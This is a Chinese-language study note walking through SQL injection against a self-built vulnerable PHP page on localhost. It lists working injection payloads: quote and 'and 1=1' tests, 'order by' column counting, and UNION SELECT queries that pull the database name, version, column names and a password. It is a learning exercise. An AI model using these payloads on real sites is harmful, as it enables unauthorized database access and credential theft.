学习笔记---Sql注入实战篇
学习笔记—Sql注入实战篇
一、编写注入的网页,用于实战。
index.php
link.php
在老板火狐中开启hackbar, 进行sql注入。
Google中hackbar**方法:
https://www.fujieace.com/hacker/tools/hackbar.html
二、Sql注入基本流程(实战篇):
输入单引号报如下错误
1=1与1=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否存在sql注入漏洞
构造 ?id=5 and 1=1 ,回车
页面返回正常
构造 ?id=5 and 1=2 ,回车
第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
http://127.0.0.1/7-27/index.php
?id=5)order by 1–+
–+注释语句,具体分析可参考下列文章:
https://blog.****.net/xiayun1995/article/details/86500605
输入1,2,3,4可以正常显示,输入5则报错:
第三步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
查询当前数据库密码
拿到了密码
http://www.91ri.org/1551.html(万能密码实战)
http://127.0.0.1/7-27/index.php
?id=1 union select column_name,2,3,4 from information_schema.columns where table_schema=database()
了解更多请关注下列公众号: